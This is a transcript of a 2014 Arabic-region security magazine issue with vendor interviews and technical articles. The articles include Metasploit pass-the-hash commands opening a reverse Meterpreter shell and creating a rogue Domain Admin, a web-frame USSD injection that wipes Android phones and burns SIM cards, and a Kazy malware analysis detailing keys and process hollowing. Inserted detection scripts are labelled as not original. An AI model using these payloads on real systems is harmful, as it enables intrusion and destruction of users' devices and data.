security kaizen magazine, issue 13

Vol.4 Issue 13 March/April 2014 www.bluekaizen.org EG-Cert 2013 Report & Statistics Interview With Elearnsecurity.Com Founder Ec Council University Review Gulf Security Camp 2014 5-7 May Dubai, UAE www.securitycamps.com

Upload: bluekaizen

Post on 24-Jul-2016


DESCRIPTION

The Security Kaizen Magazine provides information on industry advancements and professional development to those involved in the cyber security domain, who in turn educate their partners about issues and trends in the industry. Issue 13 includes interviews with Armando Romeo and Mahmoud Nimer, a Grey-Box Penetration Testing Scenario, Killing Android Mobile SIM Cards Using USSD, Security News, Encrypting Windows Traffic Using IPSec, malware analysis and more.

TRANSCRIPT

Page 1: Security Kaizen Magazine, Issue 13

Vol.4 Issue 13 March/April 2014

www.bluekaizen.org

EG-Cert 2013 Report & Statistics

Interview With Elearnsecurity.Com Founder

Ec Council University Review

Gulf Security Camp 2014, 5-7 May

Dubai, UAE

www.securitycamps.com

Page 6: Security Kaizen Magazine, Issue 13


Contents

Editor's Note  5

Interviews
Interview with Armando Romeo, CEO and Founder of eLearnSecurity  7
Interview with Mahmoud Nimer, GM and Co-Founder of the multinational StarLink

Grey Hat
Grey Box Penetration Testing Part 2  13
Killing Android Mobile SIM Cards Using USSD  15
Kazy Malware Analysis  17

Best Practice
Encrypting Windows Traffic Using IPSec

New & News
Bluekaizen News  21
OWASP  25
EG-Cert 2013 Report & Statistics  27

Reviews
Mobile Application Security Book Review  29
Master of Security Science (MSS) Course Review  31
IDC CIO Summit 2014 Event Review  33

Bluekaizen updates  37

Page 8: Security Kaizen Magazine, Issue 13

Editor's Note

Issue 12 | Securitykaizen Magazine | 5

Since we are always looking for new ideas to enhance the usability and readability of the magazine, a new feature was added to our article templates starting from this issue. We added a QR code next to each article header so that you can scan it with any mobile QR reader and navigate to the article on our website; from there you can resume reading online, share it with friends, comment and get feedback from the author.

Hello dear Security Kaizen readers, this is the second issue for this year. I'll go through the major changes quickly to keep you up to date with the summary of achievements during that period. As you might have noticed, the BlueKaizen website was updated and the whole theme changed; it is currently in beta and should be stable by the end of April.

The magazine website is now embedded in it, enabling faster access to separate articles, as we mentioned in our previous issues. You can now browse the articles by issue and author, and comment on and rate the articles, enabling you to interact directly with the original author of the article. We're still working with the authors regarding their credentials and access methods. Since it's in its beta phase, we'd be more than happy to receive all your suggestions and feedback about the new site at [email protected].

Tell us whether you like it more this way. Regarding the courses delivered, we ran many courses, the highlights being CEH and CHFI presented by Adel AbdelMoniem and the IDS & Packet Analysis deep technical course prepared and delivered by Bluekaizen. We're delivering many courses in the following months; you can check them out at sklabs.org. And for the surprise: we're launching Gulf Security Camp during 5-7 May. This will be the first time and hopefully not the last. We'll also be launching a camp in Alexandria in late June. Regarding the sessions, we'll be holding a session at Alexandria University on 15 March 2014 introducing information security to the students there. We're also presenting some hot topics at MUST University on 21 March 2014.

Page 9: Security Kaizen Magazine, Issue 13

For advertisement in Security Kaizen Magazine & the www.bluekaizen.org website:
[email protected]
Or phone: +2 0100 267 5570
+971 56 95 40127

Security Kaizen is issued bi-monthly.
Reproduction in whole or part without written permission is strictly prohibited.
ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG

Magazine Team
Chairman & Editor-in-Chief: Moataz Salah
Editor: Adham Mohamed
Contributors: Ahmed Gouda, Ahmed Saafan, Amr Amin, Mohamed Abdel Latief, Mohamed Al Fateh, Mohamed Zain
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Mohamed Saeed
Proofreading: Jeff Compton
Designed & Printed: Medhat A. Elbaky, 01013126152

Page 10: Security Kaizen Magazine, Issue 13

Interviews

Interview with Armando Romeo, CEO and Founder of eLearnSecurity

We interviewed the founder of one of the best-known security training providers worldwide to learn about the real nature of the materials and content eLearnSecurity provides.

Can you please introduce yourself to Security Kaizen magazine readers?

I'm the CEO and founder of eLearnSecurity; I'm Italian, living in Dubai. Prior to founding eLearnSecurity I was involved in a number of security assessments for private and public companies, and I spent many years on web application security research, which has always been my area of interest in IT Security.

Can you give us a quick overview of eLearnSecurity? How did it all start, and what gave you the idea?

eLearnSecurity was founded in 2010 in Italy. At that time I felt there was so much to improve and innovate in the IT Security training field that, given my and my team's experience and passion for the field, not giving it a shot would have been a waste. Back then, three other renowned IT Security professionals and I joined forces to create a comprehensive training course on penetration testing, the Penetration Testing Professional course, aka PTP. Releasing a new training course as a completely unknown company was quite a challenge.

Page 11: Security Kaizen Magazine, Issue 13


However, it immediately gained press coverage and stellar reviews from our students. From there we expanded our offerings to other areas such as Web Application Security, Reverse Engineering and Mobile Security. Today eLearnSecurity has clients in the Fortune 100, students from over 127 countries, offices in the USA, Europe and the Middle East, and a team of talented professionals that doubles in number every year.

Why did you choose the online model for providing your courses instead of the normal face-to-face style?

The online model, when done properly, is not only the future of training but also an opportunity during the slow economy years we have been through in the past 5 years. Then let's face it: the 5-day, 40-hour training answers business needs more than rationality. No one will ever learn in a classroom as much as with an online course, with such a heavy load in such a short time. Not to mention that topics like penetration testing are so complex that a teacher will hardly be able to convey theory along with practical sessions in only 40 hours. There certainly is a demand for classroom training, but the result is another story. So we decided to create a self-paced model where the student is provided with the course material in a handy dashboard, a proven path to follow and all the time required to study. We then allow students to interact with the instructor through forums in case they need further explanations. Moreover, with on-demand labs there's plenty of time and flexibility to absorb the complex topics that we teach.

What is the most unique thing eLearnSecurity courses offer compared with other providers?

eLearnSecurity has never been a mere content production company. From day 1 we always focused our attention on how we could transfer practical skills between two persons effectively by means of e-learning. We knew we had to do much more than just writing slides or recording videos. The way we achieved this goal is with the sophisticated virtual labs that we created: Coliseum, Hera and Hack.me. These are the most advanced virtual labs you will find on the subject. Coliseum allows us to instantiate many different vulnerable web applications on the fly, within a sandboxed environment that ensures safe and exclusive access per user. Hera is a complex virtual lab in which you can spawn ever new and diversified scenarios comprising networks, servers and workstations, once again isolated and dedicated for each user. Both labs run on powerful datacenters using best-of-breed virtualization technology, and we are now implementing these technologies for government bodies and corporations around the world. We have an R&D team that I believe no other training company in this field has, in number, budget and talent. In fact, 50% of our team doesn't work on what we are offering today; it is working on what we'll be offering in 2-3 years. All the readers can have a taste of the Coliseum technology by using Hack.me (https://hack.me), which is the only community-driven virtual lab on web application security. And it comes for free.

"Did you know that sklabs is the training division of Bluekaizen? They have successfully run many courses including Samurai WTF, Metasploit, CEH v8, CHFI v8 and plenty more."

Page 12: Security Kaizen Magazine, Issue 13

What challenges do you face as a new security services provider in the market?

The market understands the value in our offering and doesn't consider us new anymore. The main challenge for us is to continue to innovate while we are on such a high growth trajectory.

How do you face the challenge of accreditation and certification, especially against competitors with a strong history like EC-Council and the SANS Institute?

The market understands the difference between certifications obtained by answering quizzes and certifications obtained by performing a 100% practical exam. All our exams are practical. There is no way you can assess the proficiency of an IT Security professional by means of multiple-choice quizzes. Our certified professionals not only have to perform an exam that recreates a real-world pentest or assessment, but they also have to provide a commercial-grade report. Professionals or employers who hold our certifications know the value in their hands and do not really care about strong, or in some cases just long, history in the field. Having said that, accreditation is important for us and it's certainly something you will see coming in the near future.

Recently you opened an office in Dubai. How do you see the potential in the Middle East region?

The Middle East is an exploding market for IT Security in general, where e-learning is still probably less widespread compared to other areas of the world. However, we have witnessed an increased demand for our training even before we opened an office in Dubai. The investment we received from Middle East investment funds acknowledges our quality and innovative approach and will let us bring to market ever better and more specialized offerings for governments, companies and individuals in this region.

Among the courses you provide, which are the most popular?

The most popular course so far is our WAPT, the "Web Application Penetration Testing" course. Our newly launched MASPT, the "Mobile Application Security and Penetration Testing" course, has also gained a lot of interest from the community.

What is the range of prices for your courses, and do you provide discounts for students?

Thanks to automation and extreme attention to efficiency, we manage to keep our costs down, and we pass this advantage to our students, providing courses from $399 to $999.

How do you make sure that the course content is effective and comprehensive?

We undergo long and cyclic reviews of our content before and after a release. Before we release, we invite researchers and professionals to review and provide feedback on our content. After we release, we rely upon our students' feedback to tweak and add more content or better coverage when necessary.


Page 13: Security Kaizen Magazine, Issue 13


Interview with Mahmoud Nimer, GM and Co-Founder of the multinational StarLink

We had an interview with Mahmoud Nimer, GM and Co-Founder of the multinational StarLink, to give us an overview of the corporation.

1. Can you please introduce yourself to Security Kaizen magazine readers?

I am Mahmoud Nimer, General Manager and co-founder of StarLink. My role is to oversee the smooth operation of the value-added distribution business from a sales, technical, channel, logistics and finance perspective.

2. Can you give us a quick overview of StarLink and the products you provide?

StarLink is a leading IT compliance and next-generation threat-driven solutions provider, recognized as a "Trusted Security Advisor" and a True Value Added Distributor. StarLink today is present in 14 countries across the Middle East, Turkey and Africa, with physical resources in each of these countries. The on-the-ground teams in each country offer sales, pre-sales and post-sales services across all products in StarLink's portfolio to the channel in that country, as required by partners.

StarLink has a well-structured model for managing its portfolio of 18 vendors and has classified its vendors into Core, Emerging and Growth categories. The Core category includes vendors like IBM InfoSphere, Guardium, Dell Software, FireEye, SafeNet and Tripwire, as these vendors have been in the region for several years now and are doing multi-million dollar business. Vendors like Boole Server, Guidance Software, IronKey, Gigamon, Blue Coat, Titus and MobileIron have been in the market for a couple of years and form the Emerging solutions category, and under the Growth solutions category new technology vendors like Bit9, Core Security, Ipswitch, RedSeal Networks and Venafi are grouped. This year StarLink has also categorized its solution portfolio into four solution areas, Access Control, Advanced Threat Protection, Vulnerability Management and Secure Mobility, as a go-to-market strategy that provides an effective and easy approach for partners to sell to their customer base.

Page 14: Security Kaizen Magazine, Issue 13

3. What differentiates StarLink from other security distributors?

StarLink's vision for the Middle East, Africa and Turkey value-added-distribution business is to continue bringing best-of-breed next-generation security technologies to the region, and most importantly to be a True VAD to vendors, partners and customers. What this essentially means is that to each party, StarLink operates like an extension of their team. For our vendors it means many of them do not need to have any local presence at all, because StarLink is able to offer end-to-end expertise for the vendors' solutions, including sales, pre-sales, implementation and support. As for our partners, many do not have the resources or skill-set to position, deploy or support all of the technologies that they align with StarLink on, but they rest in the confidence of knowing that StarLink will be able to provide its end-to-end expert capabilities to them, so that they can in turn deliver exactly what their customers need.

And to our customers: StarLink's business model is unique in that we only sell through our channel, like a True VAD should, but we also maintain Trusted Advisor direct relationships with all customers by consultatively selling to them to understand their business needs and then, with our channel, mapping them to our solution areas, which cover compliance, next-generation threat protection, secure mobility and vulnerability management.

Furthermore, we also create opportunities for partners while simultaneously training and enabling the channel so that partners can go to market themselves. This significantly assists partners to realize a quick return on investment when selling StarLink's technologies, as they almost immediately start receiving qualified opportunities and are guaranteed opportunity protection when they align with StarLink. Value-added services are also available to the regional channels, like PR and communications, events, telemarketing, email campaigns, focused workshops, direct sales engagements alongside partners, technical presentations, product demonstrations, providing demo equipment, POC deployment, implementation, L1 support and L2 support. Of course all these are optional, but they are available to the entire channel and are selected by the channel based on their need.

Page 15: Security Kaizen Magazine, Issue 13


4. What is StarLink's channel strategy for the Middle East region?

StarLink's channel strategy for the Middle East region is multi-faceted, as we have 3 types of partners and 18 vendors within our VAD portfolio. The 3 types of partners that we work with are defined as Strategic Partners, Partners and Resellers. The Strategic Partners are those that align very closely with us for multiple solutions within our portfolio and commit to revenue, as well as invest in growing the business by allocating dedicated sales and technical resources to the partnership. They are essentially security-focused large system integrators. Secondly, Partners are usually security-focused VARs and security service providers that align with StarLink on one or more technologies, but do not usually commit to revenue goals and have a limited pool of resources to share across all the vendors and distributors they work with. Lastly, the Reseller category covers organizations that are typically opportunistic and do not align on any specific technology area with StarLink, but maintain ad-hoc purchase relationships with us and come to us when they identify opportunities in which StarLink's products are required.

The company has also introduced the StarLink Choice partner programme, aimed at rewarding partner success with targeted sales incentives and marketing programmes. We believe this will increase our visibility and that of partners in the market, improve commitment to both Partners and Managed Partners, grow the revenue and profitability of partners, secure the technology investments that partners are making and challenge the competition.

5. How do you see the security market in the Middle East and the emerging markets?

In 2008 the expected fallout from the global recession was observed, due to which everyone experienced a slowdown, but the security market has been the complete opposite; in fact, for us, a spike. We are lucky and privileged to be in a space of the security market that has high barriers to entry, requiring strong expertise, which we have invested in. Furthermore, with the current threat landscape and the compliance regulations impacting this region, the two main drivers for our business, we have experienced positive revenue growth for both StarLink and its channel partners over the past couple of years. We have also invested in emerging markets like sub-Saharan Africa and Turkey.

These markets currently boast a highly competitive economy based on the comprehensive integration of IT into all aspects of society and the economy, including smart infrastructure and effective service delivery. The effective uptake and utilization of IT have made a demonstrable impact on economic progress in these markets, and there are clear indications of positive change on development. Hence a change in the IT landscape in these markets is observed, in terms of its maturity, the range of corporate and government projects, and the consumerisation of corporate IT use. As a result, a growing trend in "cyber threats" is observed, which is one of the biggest problems facing these markets, because the government and private sectors have not yet taken cyber security to the point where it is a priority.

6. Which sector is focusing more on security (financial, oil & gas, government or others)?

As the Middle East is consistently becoming a hotspot for cyber war, which is very much evident from the high-profile breaches of key energy and government assets, it is observed that in 2014 higher spending on information security will be seen more in government sectors, focusing on strengthening security for national information assets and protecting the national frontline against cyber-attacks. Spending in other core verticals like banking and finance, telco, oil and gas, healthcare, education etc. will also be observed, but not quite as high as in government.

Page 16: Security Kaizen Magazine, Issue 13

Grey Hat

Grey-Box Penetration Testing Scenario (Part 2)

Information Security Engineer

We're resuming the grey-box penetration test scenario from the last issue. In this article you will learn how to fully compromise a domain environment without exploiting any vulnerability: the remaining steps rely on reusing a captured credential, not on a software flaw.

7. Go to Metasploit and use psexec with the pass-the-hash technique

Warm up your hands, as we will capture the flag now. Run Metasploit and use the psexec module as follows:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.100.10
msf exploit(psexec) > set SMBDomain pentest.corp.local
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.100.102
msf exploit(psexec) > exploit

SMBPass takes the LM:NTLM pair exactly as dumped; the LM half aad3b435b51404eeaad3b435b51404ee is the well-known value for an empty LM hash, so only the NTLM half is actually used for authentication.

Page 17: Security Kaizen Magazine, Issue 13


Gscamp is the first camp organized by Bluekaizen in the Gulf area, scheduled for 5 May.

Congratulations: you can see that the pass-the-hash technique worked and we got a reverse Meterpreter session on the domain controller.

8. Post exploitation: add a new user and make it a domain admin

Post exploitation in a penetration test can use many techniques to gather information about the network environment and can lead to further exploitation in the domain.

One of the most important steps after getting Meterpreter is to obtain SYSTEM privileges and migrate into a stable process.

In this section I will illustrate how to add a new account to the Domain Admins group to maintain access to the pentest.corp.local domain. In figure 5 you can see that I add a new user, pentestAdmin, to the domain. Then I list all the groups on this domain controller. Finally, I add pentestAdmin to Domain Admins to maintain my access to the domain pentest.corp.local. Creating a Domain Admin account on a client's domain controller is a change that must be covered by the rules of engagement and reverted when the test ends.
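The same two steps seen from the domain controller's Security log, as an added example that is not part of the original article: the script below correlates the NTLM network logon that pass-the-hash produces (event 4624, logon type 3, authentication package NTLM) with the account creation (4720) and Domain Admins membership change (4728) that follow it. The event records, the allow-list of hosts that may legitimately use NTLM against the DC and the ten-minute window are constructed assumptions for the example.

```python
"""Detection-side view of steps 7 and 8 of the scenario.

Added example, not part of the original article. It correlates the Windows
Security events a domain controller records for the sequence described above:
an NTLM network logon as Administrator from the attacker's host (pass-the-hash
through psexec), then a new account being created and added to Domain Admins.
The event records are constructed to match the scenario (DC 192.168.100.10,
attacker 192.168.100.102, domain pentest.corp.local); the host allow-list and
the time window are assumptions. Event IDs: 4624 = successful logon,
4720 = user account created, 4728 = member added to a security-enabled global group.
"""
from datetime import datetime, timedelta

# Constructed sample of what the DC's Security log would contain.
SAMPLE_EVENTS = [
    {"time": "2014-03-10T10:00:01", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetDomainName": "PENTEST", "IpAddress": "192.168.100.102",
     "WorkstationName": "KALI"},
    {"time": "2014-03-10T10:00:09", "EventID": 4720,
     "SubjectUserName": "Administrator", "TargetUserName": "pentestAdmin"},
    {"time": "2014-03-10T10:00:15", "EventID": 4728,
     "SubjectUserName": "Administrator", "TargetUserName": "Domain Admins",
     "MemberName": "CN=pentestAdmin,CN=Users,DC=pentest,DC=corp,DC=local"},
    # Benign noise: a Kerberos logon from the admin workstation on the allow-list.
    {"time": "2014-03-10T10:02:00", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "Administrator",
     "TargetDomainName": "PENTEST", "IpAddress": "192.168.100.50",
     "WorkstationName": "ADMIN-WS01"},
]

# Assumption: the only hosts from which NTLM admin logons to the DC are expected.
ALLOWED_NTLM_SOURCES = {"192.168.100.50"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
WINDOW = timedelta(minutes=10)   # how long after the logon a group change still counts


def _ts(event):
    return datetime.fromisoformat(event["time"])


def suspicious_ntlm_logons(events):
    """4624, logon type 3 (network), NTLM, privileged account, unexpected source.

    Pass-the-hash can only produce NTLM authentication; in a Kerberos domain an
    NTLM network logon as Administrator to the DC from an arbitrary host is the
    first signal of step 7.
    """
    return [e for e in events
            if e["EventID"] == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM"
            and e.get("TargetUserName", "").lower() == "administrator"
            and e.get("IpAddress") not in ALLOWED_NTLM_SOURCES]


def privileged_group_adds(events):
    """4728 events whose target group is one of the privileged groups."""
    return [e for e in events
            if e["EventID"] == 4728 and e.get("TargetUserName") in PRIVILEGED_GROUPS]


def member_cn(distinguished_name):
    """'CN=pentestAdmin,CN=Users,DC=...' -> 'pentestAdmin'."""
    first = distinguished_name.split(",")[0]
    return first[3:] if first.upper().startswith("CN=") else first


def correlate(events):
    """Link each suspicious NTLM logon to privileged-group additions that follow
    it within WINDOW; a brand-new account (4720) being added is rated critical."""
    created = {e["TargetUserName"] for e in events if e["EventID"] == 4720}
    alerts = []
    for logon in suspicious_ntlm_logons(events):
        for add in privileged_group_adds(events):
            if not _ts(logon) <= _ts(add) <= _ts(logon) + WINDOW:
                continue
            member = member_cn(add["MemberName"])
            alerts.append({
                "source_ip": logon["IpAddress"],
                "workstation": logon["WorkstationName"],
                "new_member": member,
                "group": add["TargetUserName"],
                "account_created_in_window": member in created,
                "severity": "critical" if member in created else "high",
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The first filter keys on the authentication package rather than on the source address alone: an interactive administrator in a Kerberos domain normally produces Kerberos logons, while a pass-the-hash logon is NTLM by construction, so the package name is the cheaper and more robust signal.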

9. References
9.1. http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
9.2. http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
9.3. http://www.ntdsxtract.com
9.4. https://raw.github.com/pentestgeek/metasploit-framework/master/tools/ntds_hashextract.rb

10. Summary
All the information in this article comes from real penetration testing scenarios. Some of the steps in the article are straightforward; others may need more skill to bypass restrictions such as antivirus, host intrusion prevention systems and firewalls. The most important part of a penetration test is reconnaissance and mapping: the more information you gather during the engagement, the higher the chance of capturing the flag and compromising the network.

Figure 5: post exploitation, adding a user to the domain and then adding that user to the Domain Admins group.

Page 18: Security Kaizen Magazine, Issue 13


Killing Android Mobile SIM Cards Using USSD

Senior Linux Systems Engineer

Are you using a mobile phone that runs Android as its operating system? Then please note that you are in danger, and the danger affects not just your mobile, including all its data, but also the SIM card. Can you imagine that a single line of code embedded in a web page can be used to trigger a remote factory reset of some Samsung smartphones, including the Galaxy S, SII and SIII, and also the HTC One X and HTC Sensation (running Ice Cream Sandwich), the Motorola Droid series and the Google Nexus series?

What is USSD and what is it used for?

I'm sure you have used a USSD code before: it is the code enclosed between the * and # characters. USSD stands for Unstructured Supplementary Service Data and is a session-based GSM protocol, unlike SMS or MMS. Typically it is used to send messages between a mobile phone and an application server in the network. Nowadays there are multiple services based on USSD, such as:
1. Mobile banking (Airtel Money in India, Vodafone money transfer in Kenya)
2. Social networking (Facebook, Twitter)
3. Updating mobile software over-the-air
4. Pre-paid phone top-up and balance queries

Page 19: Security Kaizen Magazine, Issue 13


In this article I will discuss how to play with USSD codes using different tools and how to exploit different services based on it. In addition, critical security issues in USSD-based services such as virtual money transfer/mobile banking and social networking will be discussed, and last, I will discuss what exactly the term "dirty use of" means.

USSD Architecture

Architectural components:
1. MSC (Mobile Switching Center) and VLR (Visitor Location Register)
2. USSD Gateway
3. USSD application/server
4. SMPP (Short Message Peer-to-Peer) interface

What is the "back door" in Android?
» The vulnerability is in the dialer itself (for example TouchWiz on Samsung devices): it fails to differentiate between dialing a phone number and executing a USSD code.
» The web browser handles the tel: URI scheme and hands the target to the dialer, which, as above, cannot tell a phone number from a USSD code.
» So the device can be forced to open such a page automatically: by touching an NFC-enabled phone to a rogue NFC tag, by opening a WAP push message, by scanning a QR code, or by a link in a special service message. An attacker can also include the link in a Twitter feed, an SMS or an email message and trick the victim into clicking it manually.

How this vulnerability can be used as an attack:
1. From a browser, with a frame whose source is a tel: URI (%23 is the URL encoding of #):
   <frame src="tel:<insert the ussd code here>%23" />
   Examples of USSD codes that work on Samsung devices:
   a. Reset to factory settings: *#7780#
   b. Full factory reset: *2767*3855# (factory hard reset to the ROM firmware default settings)
   c. Factory data reset: *#*#7780#*#* (clears Google account data, system and application settings and installed programs; the system software and OEM programs are not deleted, nor is My Documents: pictures, music, videos)
2. A QR code that makes the phone open the link carrying the USSD code (a URL shortener such as goo.gl can hide the tel: target).
3. Near field communication (NFC): the victim can only watch it happen and cannot stop it (the Galaxy SIII can be exploited this way).
4. A WAP push message that opens the injected link.

To burn the SIM card:
» Normally, after 3 wrong PIN entries the SIM locks and asks for the PUK code. The PUK is entered through an MMI sequence of the form **05*PUK*newPIN*newPIN# (for example **05*1234545*1234*1234#); **04* is the sequence that merely changes the PIN.
» 10 wrong PUK codes kill the SIM permanently, forcing you to buy a new one. A page that makes the dialer run the **05* sequence with a wrong PUK enough times therefore destroys the SIM.

How to prevent the USSD attack:
1. Install TelStop from the Google Play store. This tool mitigates the USSD attack by registering a URI handler for tel:; every time a tel: URI is activated, an application selector is shown.
Or
2. Install Dialer One as an alternate dialer for your Android device. A tel: URL will then prompt for the application to use.
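A defensive counterpart to the attack above, added here as an example and not taken from the article: the TelStop and Dialer One mitigations work by intercepting tel: intents, and the Python below shows the classification such an interceptor has to make. It URL-decodes the tel: target (so %23 becomes #), strips RFC 3966 visual separators, and refuses to auto-dial anything containing * or #; it also flags the **05* PUK sequence used to burn a SIM. The HTML page it scans is constructed from the frame trick described above; the function names and the 15-digit limit are the example's own assumptions.

```python
"""Classify tel: URIs before they reach a dialer.

Added example, not code from the original article. It implements the check
behind the mitigations the article recommends (TelStop, Dialer One): a tel:
target is only dialled automatically if it is a plain phone number; anything
containing '*' or '#' after URL-decoding is an MMI/USSD sequence and must be
shown to the user first. RFC 3966 allows '*' and '#' in local numbers, which
is why a naive handler passes them straight through to the SIM. The HTML
page below is constructed from the article's <frame src="tel:..."> trick.
"""
import re
from urllib.parse import unquote

TEL_ATTR = re.compile(r"""(?:src|href)\s*=\s*["']?(tel:[^"'\s>]+)""", re.IGNORECASE)
DIALABLE = re.compile(r"\+?[0-9]{3,15}")   # assumption: E.164 allows at most 15 digits


def classify_tel_uri(uri):
    """Return (kind, target) with kind in {'dial', 'ussd', 'reject'}."""
    if not uri.lower().startswith("tel:"):
        return ("reject", uri)
    target = unquote(uri[4:])                 # %23 -> '#', %2A -> '*'
    target = target.split(";", 1)[0]          # drop ;phone-context= and other parameters
    target = re.sub(r"[-.()\s]", "", target)  # RFC 3966 visual separators
    if "*" in target or "#" in target:
        return ("ussd", target)               # never auto-dial: show it and ask
    if DIALABLE.fullmatch(target):
        return ("dial", target)
    return ("reject", target)


def sim_lockout_risk(target):
    """**04* changes the PIN; **05* unblocks a locked PIN with the PUK. A page
    that keeps dialling **05* with a wrong PUK burns the ten PUK attempts."""
    return target.startswith("**05*")


def triage_page(html):
    """Map every tel: link or frame source on a page to its classification."""
    return {uri: classify_tel_uri(uri) for uri in TEL_ATTR.findall(html)}


# Constructed page: one legitimate link plus the injections the article describes.
SAMPLE_HTML = """
<html><body>
<a href="tel:+971-50-123-4567">Call us</a>
<frame src="tel:*2767*3855%23" />
<iframe src='tel:%2A%237780%23'></iframe>
<frame src="tel:**05*1234545*1234*1234%23" />
</body></html>
"""

if __name__ == "__main__":
    for uri, (kind, target) in triage_page(SAMPLE_HTML).items():
        flag = " (SIM lockout risk)" if kind == "ussd" and sim_lockout_risk(target) else ""
        print(f"{kind:6} {target}{flag}   <- {uri}")
```

Decoding before classifying is the whole point: the vulnerable dialers received the already-decoded string, so a filter that only looks for a literal # in the URL misses the %23 form the article uses.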

Page 20: Security Kaizen Magazine, Issue 13


Kazy Malware Analysis

Malware Analyst at EG-CERT

In this article I will summarize an attack scenario and focus on the malware used to compromise the victim's machine.

FILE INFORMATION
• File size: 241 KB
• MD5: b1b7854b73f06e7a18093e221373b8ba
• Type: Win32 EXE
• Publisher: Igor Pavlov
• File Version: 9.20
• VirusTotal detection ratio: 35 / 46
The publisher and version strings are those of the 7-Zip 9.20 release, whose author is Igor Pavlov; the sample carries a copied version resource, so these fields say nothing about its real origin.

Tools
To analyze this malware I used the Reflector decompiler to convert the .NET assembly's Microsoft Intermediate Language (MSIL) into C# code, and used it as a plug-in for Visual Studio 2010 in order to debug the .NET code.

Infection
In this attack scenario, the victim visited a malicious website that requires running a Java applet. The applet is malicious: it downloads an executable and then executes it on the system. The executable is a .NET executable that acts as a launcher/loader for an embedded executable.

Page 21: Security Kaizen Magazine, Issue 13


Introduction
This malware is highly obfuscated to hinder understanding of the code after decompilation. The malware is multithreaded, and each thread is responsible for a certain feature; for example, one thread is responsible for copying the malware onto USB thumb drives attached to the system.

.NET Original Malware
The malware loads a resource embedded within itself into memory. The loaded resource is a DLL, also .NET, as shown in figure (1). The malware calls a function named Load from the class cd16d48d9739242e0c6315b0fb2fb86b3. As you can see, the malware was run through an obfuscator to make analysis harder: class and variable names are long and meaningless, and branches that will never execute are embedded to make code review harder.

Figure (1)

The malware uses the .NET AppDomain.Load(Byte[]) function to load it as a DLL in the context of the running malware. It then calls into the newly loaded module through InvokeMember, which invokes a certain function inside the module; I will refer to it as "MainThread".

Main Thread
The main thread is responsible for initializing the other threads, creating a copy of the malware in the ApplicationData directory, and creating a registry value that ensures it starts after the system reboots. The main thread calls a function named A!A.A.AddToStartup(string RegistryKey, string RegistryName, string TempFileName, string TempFileContent, string Extension).

As its name implies, this function creates a value named "Upadate" (the sample's own misspelling) under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, using Win32.RegistryKey.SetValue, so that the malware is launched after a reboot. Before the call to AddToStartup, the function calls string.Concat to generate a path: the first string is the absolute path of ApplicationData, the second is "\Adobe", the third is a randomly generated number between 9 and 999, and the final string is ".exe". The malware then calls System.IO.File.Copy to copy itself to the newly generated path and sets the file's attributes to hidden. The malware then starts the other threads: for each one it instantiates a Thread object and calls Thread.Start.

I will now discuss the function of each thread created by the main thread.

USB Thread

Persistance Thread

MainThread

Block Thread

Loader Thread


Loader Thread

First, the Loader Thread. This thread is responsible for injecting malicious code (another malware) and running it on the victim's machine. It first reads the original malware file as a string, decodes a certain part of it and then decrypts that part; the resulting data is a hidden malware. I uploaded the resulting malware to VirusTotal and some of the AVs identified it as the “Andromeda” backdoor. I analyzed this piece of malware and I could give some information about it in another article.

The Loader thread reads the malware file as a string using System.IO.File.ReadAllText(string malwarePath). The string is then split using a specific delimiter whose ASCII representation is “VfBOBnPkjMHYKOnOZT”. The output of the split is a 14-element array. One of these elements is used as the key in the decryption of another element of the same array, which turns out to be another malware that will be injected into another running process.

I will present the most important elements. The second element is the key used in the decryption process; its ASCII representation is “ksGhCgFWiXUOgdzjuBwIZavw”. The 6th element is the “Process” string, the name of the process that the malware will launch in a suspended state and then inject the malicious code into. The 13th element is the content of the malware in encrypted form. Figure (2) shows the malware in a hex editor to highlight the delimiter.

The program then decodes the 13th element of the array using a Base64 function and decrypts it with the second element of the array, “ksGhCgFWiXUOgdzjuBwIZavw”, using a function called PolyDecrypt, as shown in figure (3).

The result of the PolyDecrypt function is a byte[] which is actually the backdoor payload that this malware is trying to execute on the victim's machine. The malware then calls a function named inject(byte[] PolyDecryptOutput, string virusName).

The malware uses a systematic technique common among malware authors, called process replacement. First it starts a process in a suspended state; in our case it starts a copy of vbc.exe, the Visual Basic compiler that is part of the .NET Framework. Then, using UnmapViewOfSection, it removes the original process's data starting from the image base, and using VirtualAllocEx and WriteProcessMemory it writes its own code in its place. Finally, it uses SetThreadContext and ResumeThread to continue execution in the code it wrote. So the backdoor is now executed on the system.

Block Thread

The second thread is the Block thread, which simply checks whether the malware is executing in a certain sandbox environment. It first gets all running processes in the system using the Process.GetProcesses function and then compares the names of the processes to “sandboxierpcss”. If that name is found, the malware exits.

USB Thread

The third thread is the USB thread, which copies the malware to all USB drives attached to the system. The thread calls System.IO.Directory.GetLogicalDrives() to get all currently available disk drives and builds a path of the form “Drive:\rundll32.exe” to copy the malware into the drive under that name. It then creates another file, “autorun.ini”, and uses the FilePut function to write “[autorun]\r\nshellexecute=rundll32.exe” into it, so that when a user connects the USB flash drive to his computer the malware executes automatically and infects his system as well. It is worth mentioning that both files are created and then SetFileAttribute is used to make them hidden.

Persistence Thread

The final thread is the Persistence thread, which ensures that there is an entry under the Run key so that the malware starts after each reboot. The malware first checks whether the registry entry already exists by calling the A!A.A.CheckKey() function; if it does not, it calls the previously mentioned function A!A.A.AddToStartup (from the main thread) to add an entry under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”.
